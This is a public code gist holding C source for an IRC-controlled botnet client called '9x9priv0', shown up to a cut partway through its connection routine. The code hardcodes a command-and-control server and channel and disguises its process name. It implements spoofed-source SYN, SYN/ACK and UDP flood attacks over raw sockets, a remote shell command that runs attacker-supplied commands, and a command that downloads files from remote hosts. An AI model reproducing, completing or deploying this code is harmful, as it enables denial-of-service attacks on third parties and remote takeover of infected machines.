Skip to content

Instantly share code, notes, and snippets.

@chines

chines/gist:4596612

Created January 22, 2013 17:46
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save chines/4596612 to your computer and use it in GitHub Desktop.
Save chines/4596612 to your computer and use it in GitHub Desktop.
Download ZIP
IRC hack source code
Raw
gistfile1.txt
/******************************
* *
* 9x9priv0 v1.2 by 9x9team *
* *
*******************************/
#define STARTUP
#undef IDENT
#define FAKENAME "init"
#define CHAN "##Hax"
#define KEY "gayr0x"
int numservers=1;
char *servers[] = {
"anal.dnsdynamic.net",
(void*)0
};
#include <stdarg.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <strings.h>
#include <netinet/in.h>
#include <unistd.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <signal.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <time.h>
#include <sys/wait.h>
#include <sys/ioctl.h>
int sock,changeservers=0;
char *server, *chan, *key, *nick, *ident, *user, disabled=0, execfile[256],dispass[256];
unsigned int *pids;
unsigned long spoofs=0, spoofsm=0, numpids=0;
int strwildmatch(const char* pattern, const char* string) {
switch(*pattern) {
case '\0': return *string;
case '*': return !(!strwildmatch(pattern+1, string) || *string && !strwildmatch(pattern, string+1));
case '?': return !(*string && !strwildmatch(pattern+1, string+1));
default: return !((toupper(*pattern) == toupper(*string)) && !strwildmatch(pattern+1, string+1));
}
}
int Send(int sock, char *words, ...) {
static char textBuffer[1024];
va_list args;
va_start(args, words);
vsprintf(textBuffer, words, args);
va_end(args);
return write(sock,textBuffer,strlen(textBuffer));
}
int mfork(char *sender) {
unsigned int parent, *newpids, i;
if (disabled == 1) {
Send(sock,"NOTICE %s :Unable to comply.\n",sender);
return 1;
}
parent=fork();
if (parent <= 0) return parent;
numpids++;
newpids=(unsigned int*)malloc((numpids+1)*sizeof(unsigned int));
for (i=0;i<numpids-1;i++) newpids[i]=pids[i];
newpids[numpids-1]=parent;
free(pids);
pids=newpids;
return parent;
}
unsigned long getspoof() {
if (!spoofs) return rand();
if (spoofsm == 1) return ntohl(spoofs);
return ntohl(spoofs+(rand() % spoofsm)+1);
}
void filter(char *a) { while(a[strlen(a)-1] == '\r' || a[strlen(a)-1] == '\n') a[strlen(a)-1]=0; }
char *makestring() {
char *tmp;
int len=(rand()%5)+4,i;
FILE *file;
tmp=(char*)malloc(len+1);
memset(tmp,0,len+1);
if ((file=fopen("/usr/dict/words","r")) == NULL) for (i=0;i<len;i++) tmp[i]=(rand()%(91-65))+65;
else {
int a=((rand()*rand())%45402)+1;
char buf[1024];
for (i=0;i<a;i++) fgets(buf,1024,file);
memset(buf,0,1024);
fgets(buf,1024,file);
filter(buf);
memcpy(tmp,buf,len);
fclose(file);
}
return tmp;
}
void identd() {
int sockname,sockfd,sin_size,tmpsock,i;
struct sockaddr_in my_addr,their_addr;
char szBuffer[1024];
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) return;
my_addr.sin_family = AF_INET;
my_addr.sin_port = htons(113);
my_addr.sin_addr.s_addr = INADDR_ANY;
memset(&(my_addr.sin_zero), 0, 8);
if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1) return;
if (listen(sockfd, 1) == -1) return;
if (fork() == 0) return;
sin_size = sizeof(struct sockaddr_in);
if ((tmpsock = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size)) == -1) exit(0);
for(;;) {
fd_set bla;
struct timeval timee;
FD_ZERO(&bla);
FD_SET(tmpsock,&bla);
timee.tv_sec=timee.tv_usec=60;
if (select(tmpsock + 1,&bla,(fd_set*)0,(fd_set*)0,&timee) < 0) exit(0);
if (FD_ISSET(tmpsock,&bla)) break;
}
i = recv(tmpsock,szBuffer,1024,0);
if (i <= 0 || i >= 20) exit(0);
szBuffer[i]=0;
if (szBuffer[i-1] == '\n' || szBuffer[i-1] == '\r') szBuffer[i-1]=0;
if (szBuffer[i-2] == '\n' || szBuffer[i-2] == '\r') szBuffer[i-2]=0;
Send(tmpsock,"%s : USERID : UNIX : %s\n",szBuffer,ident);
close(tmpsock);
close(sockfd);
exit(0);
}
long pow(long a, long b) {
if (b == 0) return 1;
if (b == 1) return a;
return a*pow(a,b-1);
}
u_short in_cksum(u_short *addr, int len) {
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer =0;
while (nleft > 1) {
sum += *w++;
nleft -= 2;
}
if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *)w;
sum += answer;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}
void get(int sock, char *sender, int argc, char **argv) {
int sock2,i,d;
struct sockaddr_in server;
unsigned long ipaddr;
char buf[1024];
FILE *file;
unsigned char bufm[4096];
if (mfork(sender) != 0) return;
if (argc < 2) {
Send(sock,"NOTICE %s :GET <host> <save as>\n",sender);
exit(0);
}
if ((sock2 = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
Send(sock,"NOTICE %s :Unable to create socket.\n",sender);
exit(0);
}
if (!strncmp(argv[1],"http://",7)) strcpy(buf,argv[1]+7);
else strcpy(buf,argv[1]);
for (i=0;i<strlen(buf) && buf[i] != '/';i++);
buf[i]=0;
server.sin_family = AF_INET;
server.sin_port = htons(22);
if ((ipaddr = inet_addr(buf)) == -1) {
struct hostent *hostm;
if ((hostm=gethostbyname(buf)) == NULL) {
Send(sock,"NOTICE %s :Unable to resolve address.\n",sender);
exit(0);
}
memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length);
}
else server.sin_addr.s_addr = ipaddr;
memset(&(server.sin_zero), 0, 8);
if (connect(sock2,(struct sockaddr *)&server, sizeof(server)) != 0) {
Send(sock,"NOTICE %s :Unable to connect to http.\n",sender);
exit(0);
}
Send(sock2,"GET /%s HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)\r\nHost: %s:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n",buf+i+1,buf);
Send(sock,"NOTICE %s :Receiving file.\n",sender);
file=fopen(argv[2],"wb");
while(1) {
int i;
if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
if (i < 4096) bufm[i]=0;
for (d=0;d<i;d++) if (!strncmp(bufm+d,"\r\n\r\n",4)) {
for (d+=4;d<i;d++) fputc(bufm[d],file);
goto done;
}
}
done:
Send(sock,"NOTICE %s :Saved as %s\n",sender,argv[2]);
while(1) {
int i,d;
if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
if (i < 4096) bufm[i]=0;
for (d=0;d<i;d++) fputc(bufm[d],file);
}
fclose(file);
close(sock2);
exit(0);
}
void getspoofs(int sock, char *sender, int argc, char **argv) {
unsigned long a=spoofs,b=spoofs+(spoofsm-1);
if (spoofsm == 1) Send(sock,"NOTICE %s :Spoofs: %d.%d.%d.%d\n",sender,((u_char*)&a)[3],((u_char*)&a)[2],((u_char*)&a)[1],((u_char*)&a)[0]);
else Send(sock,"NOTICE %s :Spoofs: %d.%d.%d.%d - %d.%d.%d.%d\n",sender,((u_char*)&a)[3],((u_char*)&a)[2],((u_char*)&a)[1],((u_char*)&a)[0],((u_char*)&b)[3],((u_char*)&b)[2],((u_char*)&b)[1],((u_char*)&b)[0]);
}
void version(int sock, char *sender, int argc, char **argv) {
Send(sock,"NOTICE %s :9x9 priv0 1.2\n",sender);
}
void nickc(int sock, char *sender, int argc, char **argv) {
if (argc != 1) {
Send(sock,"NOTICE %s :NICK <nick>\n",sender);
return;
}
if (strlen(argv[1]) >= 10) {
Send(sock,"NOTICE %s :Nick cannot be larger than 9 characters.\n",sender);
return;
}
Send(sock,"NICK %s\n",argv[1]);
}
void spoof(int sock, char *sender, int argc, char **argv) {
char ip[256];
int i, num;
unsigned long uip;
if (argc != 1) {
Send(sock,"NOTICE %s :Removed all spoofs\n",sender);
spoofs=0;
spoofsm=0;
return;
}
if (strlen(argv[1]) > 16) {
Send(sock,"NOTICE %s :What kind of subnet address is that? Do something like: 169.40\n",sender);
return;
}
strcpy(ip,argv[1]);
if (ip[strlen(ip)-1] == '.') ip[strlen(ip)-1] = 0;
for (i=0, num=1;i<strlen(ip);i++) if (ip[i] == '.') num++;
num=-(num-4);
for (i=0;i<num;i++) strcat(ip,".0");
uip=inet_network(ip);
if (num == 0) spoofsm=1;
else spoofsm=pow(256,num);
spoofs=uip;
}
struct iphdr {
unsigned int ihl:4, version:4;
unsigned char tos;
unsigned short tot_len;
unsigned short id;
unsigned short frag_off;
unsigned char ttl;
unsigned char protocol;
unsigned short check;
unsigned long saddr;
unsigned long daddr;
};
struct udphdr {
unsigned short source;
unsigned short dest;
unsigned short len;
unsigned short check;
};
struct tcphdr {
unsigned short source;
unsigned short dest;
unsigned long seq;
unsigned long ack_seq;
unsigned short res1:4, doff:4;
unsigned char fin:1, syn:1, rst:1, psh:1, ack:1, urg:1, ece:1, cwr:1;
unsigned short window;
unsigned short check;
unsigned short urg_ptr;
};
struct send_tcp {
struct iphdr ip;
struct tcphdr tcp;
char buf[20];
};
struct pseudo_header {
unsigned int source_address;
unsigned int dest_address;
unsigned char placeholder;
unsigned char protocol;
unsigned short tcp_length;
struct tcphdr tcp;
char buf[20];
};
unsigned int host2ip(char *sender,char *hostname) {
static struct in_addr i;
struct hostent *h;
if((i.s_addr = inet_addr(hostname)) == -1) {
if((h = gethostbyname(hostname)) == NULL) {
Send(sock, "NOTICE %s :Unable to resolve %s\n", sender,hostname);
exit(0);
}
bcopy(h->h_addr, (char *)&i.s_addr, h->h_length);
}
return i.s_addr;
}
void udp(int sock, char *sender, int argc, char **argv) {
unsigned int port,i=0;
unsigned long psize,target,secs;
struct sockaddr_in s_in;
struct iphdr *ip;
struct udphdr *udp;
char buf[1500],*str;
int get;
time_t start=time(NULL);
if (mfork(sender) != 0) return;
if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
if (argc < 3) {
Send(sock,"NOTICE %s :UDP <target> <port> <secs>\n",sender);
exit(1);
}
target = host2ip(sender,argv[1]);
port = atoi(argv[2]);
secs = atol(argv[3]);
ip=(void*)buf;
udp=(void*)(buf+sizeof(struct iphdr));
str=(void*)(buf+sizeof(struct iphdr)+sizeof(struct udphdr));
memset(str,10,1500-(sizeof(struct iphdr)+sizeof(struct udphdr)));
Send(sock,"NOTICE %s :UDP Packeting %s.\n",sender,argv[1]);
ip->ihl = 5;
ip->version = 4;
ip->tos = 0;
ip->tot_len = 1500;
ip->frag_off = 0;
ip->protocol = 17;
ip->ttl = 64;
ip->daddr = target;
udp->len = htons(psize);
s_in.sin_family = AF_INET;
s_in.sin_addr.s_addr = target;
for (;;) {
udp->source = rand();
if (port) udp->dest = htons(port);
else udp->dest = rand();
udp->check = in_cksum((u_short *)buf,1500);
ip->saddr = getspoof();
ip->id = rand();
ip->check = in_cksum((u_short *)buf,1500);
s_in.sin_port = udp->dest;
sendto(get,buf,1500,0,(struct sockaddr *)&s_in,sizeof(s_in));
if (i >= 50) {
if (time(NULL) >= start+secs) exit(0);
i=0;
}
i++;
}
}
void pan(int sock, char *sender, int argc, char **argv) {
struct send_tcp send_tcp;
struct pseudo_header pseudo_header;
struct sockaddr_in sin;
unsigned int syn[20] = { 2,4,5,180,4,2,8,10,0,0,0,0,0,0,0,0,1,3,3,0 }, a=0;
unsigned int psize=20, source, dest, check;
unsigned long saddr, daddr,secs;
int get;
time_t start=time(NULL);
if (mfork(sender) != 0) return;
if (argc < 3) {
Send(sock,"NOTICE %s :PAN <target> <port> <secs>\n",sender);
exit(1);
}
if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
{int i; for(i=0;i<20;i++) send_tcp.buf[i]=(u_char)syn[i];}
daddr=host2ip(sender,argv[1]);
secs=atol(argv[3]);
Send(sock,"NOTICE %s :Panning %s.\n",sender,argv[1]);
send_tcp.ip.ihl = 5;
send_tcp.ip.version = 4;
send_tcp.ip.tos = 16;
send_tcp.ip.frag_off = 64;
send_tcp.ip.ttl = 64;
send_tcp.ip.protocol = 6;
send_tcp.tcp.ack_seq = 0;
send_tcp.tcp.doff = 10;
send_tcp.tcp.res1 = 0;
send_tcp.tcp.cwr = 0;
send_tcp.tcp.ece = 0;
send_tcp.tcp.urg = 0;
send_tcp.tcp.ack = 0;
send_tcp.tcp.psh = 0;
send_tcp.tcp.rst = 0;
send_tcp.tcp.fin = 0;
send_tcp.tcp.syn = 1;
send_tcp.tcp.window = 30845;
send_tcp.tcp.urg_ptr = 0;
dest=htons(atoi(argv[2]));
while(1) {
source=rand();
if (atoi(argv[2]) == 0) dest=rand();
saddr=getspoof();
send_tcp.ip.tot_len = htons(40+psize);
send_tcp.ip.id = rand();
send_tcp.ip.saddr = saddr;
send_tcp.ip.daddr = daddr;
send_tcp.ip.check = 0;
send_tcp.tcp.source = source;
send_tcp.tcp.dest = dest;
send_tcp.tcp.seq = rand();
send_tcp.tcp.check = 0;
sin.sin_family = AF_INET;
sin.sin_port = dest;
sin.sin_addr.s_addr = send_tcp.ip.daddr;
send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20);
check = rand();
send_tcp.buf[9]=((char*)&check)[0];
send_tcp.buf[10]=((char*)&check)[1];
send_tcp.buf[11]=((char*)&check)[2];
send_tcp.buf[12]=((char*)&check)[3];
pseudo_header.source_address = send_tcp.ip.saddr;
pseudo_header.dest_address = send_tcp.ip.daddr;
pseudo_header.placeholder = 0;
pseudo_header.protocol = IPPROTO_TCP;
pseudo_header.tcp_length = htons(20+psize);
bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20);
bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize);
send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32+psize);
sendto(get, &send_tcp, 40+psize, 0, (struct sockaddr *)&sin, sizeof(sin));
if (a >= 50) {
if (time(NULL) >= start+secs) exit(0);
a=0;
}
a++;
}
close(get);
exit(0);
}
void mra(int sock, char *sender, int argc, char **argv) {
int flag=1,fd,i;
unsigned long secs;
char *buf=(char*)malloc(128);
struct hostent *hp;
struct sockaddr_in in;
time_t start=time(NULL);
if (mfork(sender) != 0) return;
if (argc < 2) {
Send(sock,"NOTICE %s :MRA <target> <secs>\n",sender);
exit(1);
}
secs=atol(argv[2]);
memset((void*)&in,0,sizeof(struct sockaddr_in));
in.sin_addr.s_addr=host2ip(sender,argv[1]);
in.sin_family = AF_INET;
Send(sock,"NOTICE %s :Mraring %s.\n",sender,argv[1]);
while(1) {
in.sin_port = rand();
if ((fd = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) < 0);
else {
flag=1;
ioctl(fd,FIONBIO,&flag);
sendto(fd,buf,128,0,(struct sockaddr*)&in,sizeof(in));
close(fd);
}
if (i >= 50) {
if (time(NULL) >= start+secs) break;
i=0;
}
i++;
}
close(fd);
exit(0);
}
void mix(int sock, char *sender, int argc, char **argv) {
struct send_tcp send_tcp;
struct pseudo_header pseudo_header;
struct sockaddr_in sin;
unsigned int syn[20] = { 2,4,5,180,4,2,8,10,0,0,0,0,0,0,0,0,1,3,3,0 }, a=0;
unsigned int psize=20, source, dest, check;
unsigned long saddr, daddr,secs;
int get;
time_t start=time(NULL);
if (mfork(sender) != 0) return;
if (argc < 3) {
Send(sock,"NOTICE %s :MIX <target> <port> <secs>\n",sender);
exit(1);
}
if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
{int i; for(i=0;i<20;i++) send_tcp.buf[i]=(u_char)syn[i];}
daddr=host2ip(sender,argv[1]);
secs=atol(argv[3]);
dest=htons(atoi(argv[2]));
Send(sock,"NOTICE %s :Mixing TCP SYN/ACK %s.\n",sender,argv[1]);
send_tcp.ip.ihl = 5;
send_tcp.ip.version = 4;
send_tcp.ip.tos = 16;
send_tcp.ip.frag_off = 64;
send_tcp.ip.ttl = 255;
send_tcp.ip.protocol = 6;
send_tcp.tcp.doff = 5;
send_tcp.tcp.res1 = 0;
send_tcp.tcp.cwr = 0;
send_tcp.tcp.ece = 0;
send_tcp.tcp.urg = 0;
send_tcp.tcp.ack = 1;
send_tcp.tcp.psh = 0;
send_tcp.tcp.rst = 0;
send_tcp.tcp.fin = 0;
send_tcp.tcp.syn = 1;
send_tcp.tcp.window = 30845;
send_tcp.tcp.urg_ptr = 0;
while(1) {
saddr=getspoof();
if (atoi(argv[2]) == 0) dest=rand();
send_tcp.ip.tot_len = htons(40+psize);
send_tcp.ip.id = rand();
send_tcp.ip.check = 0;
send_tcp.ip.saddr = saddr;
send_tcp.ip.daddr = daddr;
send_tcp.tcp.source = rand();
send_tcp.tcp.dest = dest;
send_tcp.tcp.seq = rand();
send_tcp.tcp.ack_seq = rand();
send_tcp.tcp.check = 0;
sin.sin_family = AF_INET;
sin.sin_port = send_tcp.tcp.dest;
sin.sin_addr.s_addr = send_tcp.ip.daddr;
send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20);
check = in_cksum((unsigned short *)&send_tcp, 40);
pseudo_header.source_address = send_tcp.ip.saddr;
pseudo_header.dest_address = send_tcp.ip.daddr;
pseudo_header.placeholder = 0;
pseudo_header.protocol = IPPROTO_TCP;
pseudo_header.tcp_length = htons(20+psize);
bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20);
bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize);
send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32+psize);
sendto(get, &send_tcp, 40+psize, 0, (struct sockaddr *)&sin, sizeof(sin));
if (a >= 50) {
if (time(NULL) >= start+secs) exit(0);
a=0;
}
a++;
}
close(get);
exit(0);
}
void syn(int sock, char *sender, int argc, char **argv) {
struct send_tcp send_tcp;
struct pseudo_header pseudo_header;
struct sockaddr_in sin;
unsigned int syn[20] = { 2,4,5,180,4,2,8,10,0,0,0,0,0,0,0,0,1,3,3,0 }, a=0;
unsigned int psize=20, source, dest, check;
unsigned long saddr, daddr,secs;
int get;
time_t start=time(NULL);
if (mfork(sender) != 0) return;
if (argc < 3) {
Send(sock,"NOTICE %s :SYN <target> <port> <secs>\n",sender);
exit(1);
}
if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
{int i; for(i=0;i<20;i++) send_tcp.buf[i]=(u_char)syn[i];}
daddr=host2ip(sender,argv[1]);
secs=atol(argv[3]);
Send(sock,"NOTICE %s :Syning with TCP SYN %s.\n",sender,argv[1]);
send_tcp.ip.ihl = 5;
send_tcp.ip.version = 4;
send_tcp.ip.tos = 16;
send_tcp.ip.frag_off = 64;
send_tcp.ip.ttl = 64;
send_tcp.ip.protocol = 6;
send_tcp.tcp.ack_seq = 0;
send_tcp.tcp.doff = 10;
send_tcp.tcp.res1 = 0;
send_tcp.tcp.cwr = 0;
send_tcp.tcp.ece = 0;
send_tcp.tcp.urg = 0;
send_tcp.tcp.ack = 0;
send_tcp.tcp.psh = 0;
send_tcp.tcp.rst = 0;
send_tcp.tcp.fin = 0;
send_tcp.tcp.syn = 1;
send_tcp.tcp.window = 30845;
send_tcp.tcp.urg_ptr = 0;
dest=htons(atoi(argv[2]));
while(1) {
source=rand();
if (atoi(argv[2]) == 0) dest=rand();
saddr=getspoof();
send_tcp.ip.tot_len = htons(40+psize);
send_tcp.ip.id = rand();
send_tcp.ip.saddr = saddr;
send_tcp.ip.daddr = daddr;
send_tcp.ip.check = 0;
send_tcp.tcp.source = source;
send_tcp.tcp.dest = dest;
send_tcp.tcp.seq = rand();
send_tcp.tcp.check = 0;
sin.sin_family = AF_INET;
sin.sin_port = dest;
sin.sin_addr.s_addr = send_tcp.ip.daddr;
send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20);
check = rand();
send_tcp.buf[9]=((char*)&check)[0];
send_tcp.buf[10]=((char*)&check)[1];
send_tcp.buf[11]=((char*)&check)[2];
send_tcp.buf[12]=((char*)&check)[3];
pseudo_header.source_address = send_tcp.ip.saddr;
pseudo_header.dest_address = send_tcp.ip.daddr;
pseudo_header.placeholder = 0;
pseudo_header.protocol = IPPROTO_TCP;
pseudo_header.tcp_length = htons(20+psize);
bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20);
bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize);
send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32+psize);
sendto(get, &send_tcp, 40+psize, 0, (struct sockaddr *)&sin, sizeof(sin));
if (a >= 50) {
if (time(NULL) >= start+secs) exit(0);
a=0;
}
a++;
}
close(get);
exit(0);
}
void x9syn(int sock, char *sender, int argc, char **argv) {
int flag=1,fd,i;
unsigned long secs;
char *buf=(char*)malloc(9216);
struct hostent *hp;
struct sockaddr_in in;
time_t start=time(NULL);
if (mfork(sender) != 0) return;
if (argc < 2) {
Send(sock,"NOTICE %s :X9SYN <target> <secs>\n",sender);
exit(1);
}
secs=atol(argv[2]);
memset((void*)&in,0,sizeof(struct sockaddr_in));
in.sin_addr.s_addr=host2ip(sender,argv[1]);
in.sin_family = AF_INET;
Send(sock,"NOTICE %s :Initated x9syn-Flood on %s. [9216byte] bufferfly \n",sender,argv[1]);
while(1) {
in.sin_port = rand();
if ((fd = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) < 0);
else {
flag=1;
ioctl(fd,FIONBIO,&flag);
sendto(fd,buf,9216,0,(struct sockaddr*)&in,sizeof(in));
close(fd);
}
if (i >= 50) {
if (time(NULL) >= start+secs) break;
i=0;
}
i++;
}
close(fd);
exit(0);
}
void x9synx(int sock, char *sender, int argc, char **argv) {
int flag=1,fd,i;
unsigned long secs;
char *buf=(char*)malloc(100000);
struct hostent *hp;
struct sockaddr_in in;
time_t start=time(NULL);
if (mfork(sender) != 0) return;
if (argc < 2) {
Send(sock,"NOTICE %s :X9SYNX <target> <secs>\n",sender);
exit(1);
}
secs=atol(argv[2]);
memset((void*)&in,0,sizeof(struct sockaddr_in));
in.sin_addr.s_addr=host2ip(sender,argv[1]);
in.sin_family = AF_INET;
Send(sock,"NOTICE %s :Initated x9synx-Flood on %s. [100000byte] bufferfly \n",sender,argv[1]);
while(1) {
in.sin_port = rand();
if ((fd = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) < 0);
else {
flag=1;
ioctl(fd,FIONBIO,&flag);
sendto(fd,buf,100000,0,(struct sockaddr*)&in,sizeof(in));
close(fd);
}
if (i >= 50) {
if (time(NULL) >= start+secs) break;
i=0;
}
i++;
}
close(fd);
exit(0);
}
void petarda(int sock, char *sender, int argc, char **argv) {
if (argc != 1) {
Send(sock,"NOTICE %s :DISABLE <pass>\n",sender);
Send(sock,"NOTICE %s :Current status is: %s.\n",sender,disabled?"Disabled":"Enabled and awaiting orders");
return;
}
if (disabled) {
Send(sock,"NOTICE %s :Already disabled.\n",sender);
return;
}
if (strlen(argv[1]) > 254) {
Send(sock,"NOTICE %s :Password too long! > 254\n",sender);
return;
}
disabled=1;
memset(dispass,0,256);
strcpy(dispass,argv[1]);
Send(sock,"NOTICE %s :Disable sucessful.\n");
}
void enable(int sock, char *sender, int argc, char **argv) {
if (argc != 1) {
Send(sock,"NOTICE %s :ENABLE <pass>\n",sender);
Send(sock,"NOTICE %s :Current status is: %s.\n",sender,disabled?"Disabled":"Enabled and awaiting orders");
return;
}
if (!disabled) {
Send(sock,"NOTICE %s :Already enabled.\n",sender);
return;
}
if (strcasecmp(dispass,argv[1])) {
Send(sock,"NOTICE %s :Wrong password\n",sender);
return;
}
disabled=0;
Send(sock,"NOTICE %s :Password correct.\n",sender);
}
void move(int sock, char *sender, int argc, char **argv) {
if (argc < 1) {
Send(sock,"NOTICE %s :MOVE <server>\n",sender);
exit(1);
}
server=strdup(argv[1]);
changeservers=1;
close(sock);
}
void killall(int sock, char *sender, int argc, char **argv) {
unsigned long i;
for (i=0;i<numpids;i++) {
if (pids[i] != 0 && pids[i] != getpid()) {
if (sender) Send(sock,"NOTICE %s :Killing pid %d.\n",sender,pids[i]);
kill(pids[i],9);
}
}
}
void fuckoff2(int sock, char *sender, int argc, char **argv) {
if (!petarda) kill(0,9);
else Send(sock,"NOTICE %s :Unable to comply.\n");
}
struct FMessages { char *cmd; void (* func)(int,char *,int,char **); } flooders[] = {
{ "MIX", mix },
{ "PAN", pan },
{ "UDP", udp },
{ "SYN", syn },
{ "MRA", mra },
{ "X9SYN", x9syn },
{ "X9SYNX", x9synx },
{ "FUCKOFF2", fuckoff2 },
{ "PETARDA", petarda },
{ "ENABLE", enable },
{ "NICK", nickc },
{ "SERVER", move },
{ "GETSPOOFS", getspoofs },
{ "SPOOFS", spoof },
{ "GET", get },
{ "VERSION", version },
{ "KILLALL", killall },
{ (char *)0, (void (*)(int,char *,int,char **))0 } };
void _PRIVMSG(int sock, char *sender, char *str) {
int i;
char *to, *message;
for (i=0;i<strlen(str) && str[i] != ' ';i++);
str[i]=0;
to=str;
message=str+i+2;
for (i=0;i<strlen(sender) && sender[i] != '!';i++);
sender[i]=0;
if (*message == '!' && !strcasecmp(to,chan)) {
char *params[12], name[1024]={0};
int num_params=0, m;
message++;
for (i=0;i<strlen(message) && message[i] != ' ';i++);
message[i]=0;
if (strwildmatch(message,nick)) return;
message+=i+1;
if (!strncmp(message,"IRC ",4)) if (disabled) Send(sock,"NOTICE %s :Unable to comply.\n",sender); else Send(sock,"%s\n",message+4);
if (!strncmp(message,"SH ",3)) {
char buf[1024];
FILE *command;
if (mfork(sender) != 0) return;
memset(buf,0,1024);
sprintf(buf,"export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%s",message+3);
command=popen(buf,"r");
while(!feof(command)) {
memset(buf,0,1024);
fgets(buf,1024,command);
Send(sock,"NOTICE %s :%s\n",sender,buf);
sleep(1);
}
pclose(command);
exit(0);
}
m=strlen(message);
for (i=0;i<m;i++) {
if (*message == ' ' || *message == 0) break;
name[i]=*message;
message++;
}
for (i=0;i<strlen(message);i++) if (message[i] == ' ') num_params++;
num_params++;
if (num_params > 10) num_params=10;
params[0]=name;
params[num_params+1]="\0";
m=1;
while (*message != 0) {
message++;
if (m >= num_params) break;
for (i=0;i<strlen(message) && message[i] != ' ';i++);
params[m]=(char*)malloc(i+1);
strncpy(params[m],message,i);
params[m][i]=0;
m++;
message+=i;
}
for (m=0; flooders[m].cmd != (char *)0; m++) {
if (!strcasecmp(flooders[m].cmd,name)) {
flooders[m].func(sock,sender,num_params-1,params);
for (i=1;i<num_params;i++) free(params[i]);
return;
}
}
}
}
void _376(int sock, char *sender, char *str) {
Send(sock,"MODE %s -xi\n",nick);
Send(sock,"JOIN %s :%s\n",chan,key);
Send(sock,"WHO %s\n",nick);
}
void _PING(int sock, char *sender, char *str) {
Send(sock,"PONG %s\n",str);
}
void _352(int sock, char *sender, char *str) {
int i,d;
char *msg=str;
struct hostent *hostm;
unsigned long m;
for (i=0,d=0;d<5;d++) {
for (;i<strlen(str) && *msg != ' ';msg++,i++); msg++;
if (i == strlen(str)) return;
}
for (i=0;i<strlen(msg) && msg[i] != ' ';i++);
msg[i]=0;
if (!strcasecmp(msg,nick) && !spoofsm) {
msg=str;
for (i=0,d=0;d<3;d++) {
for (;i<strlen(str) && *msg != ' ';msg++,i++); msg++;
if (i == strlen(str)) return;
}
for (i=0;i<strlen(msg) && msg[i] != ' ';i++);
msg[i]=0;
if ((m = inet_addr(msg)) == -1) {
if ((hostm=gethostbyname(msg)) == NULL) {
Send(sock,"NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.\n",chan);
return;
}
memcpy((char*)&m, hostm->h_addr, hostm->h_length);
}
((char*)&spoofs)[3]=((char*)&m)[0];
((char*)&spoofs)[2]=((char*)&m)[1];
((char*)&spoofs)[1]=((char*)&m)[2];
((char*)&spoofs)[0]=0;
spoofsm=256;
}
}
void _433(int sock, char *sender, char *str) {
free(nick);
nick=makestring();
}
void _NICK(int sock, char *sender, char *str) {
int i;
for (i=0;i<strlen(sender) && sender[i] != '!';i++);
sender[i]=0;
if (!strcasecmp(sender,nick)) {
if (*str == ':') str++;
if (nick) free(nick);
nick=strdup(str);
}
}
struct Messages { char *cmd; void (* func)(int,char *,char *); } msgs[] = {
{ "352", _352 },
{ "376", _376 },
{ "433", _433 },
{ "422", _376 },
{ "PRIVMSG", _PRIVMSG },
{ "PING", _PING },
{ "NICK", _NICK },
{ (char *)0, (void (*)(int,char *,char *))0 } };
void con() {
struct sockaddr_in srv;
unsigned long ipaddr,start;
int flag;
struct hostent *hp;
start:
sock=-1;
flag=1;
if (changeservers == 0) server=servers[rand()%numservers];
changeservers=0;
while ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0);
if (inet_addr(server) == 0 || inet_addr(server) == -1) {
if ((hp = gethostbyname(server)) == NULL) {
server=NULL;
close(sock);
goto start;
}
bcopy((char*)hp->h_addr, (char*)&srv.sin_addr, hp->h_length);
}
else srv.sin_addr.s_addr=inet_addr(server);
srv.sin_family = AF_INET;
srv.sin_port = htons(5050);
ioctl(sock,FIONBIO,&flag);
start=time(NULL);
while(time(NULL)-start < 10) {
errno=0;
if (connect(sock, (struct sockaddr *)&srv, sizeof(srv)) == 0 || errno == EISCONN) {
setsockopt(sock,SOL_SOCKET,SO_LINGER,0,0);
setsockopt(sock,SOL_SOCKET,SO_REUSEADDR,0,0);
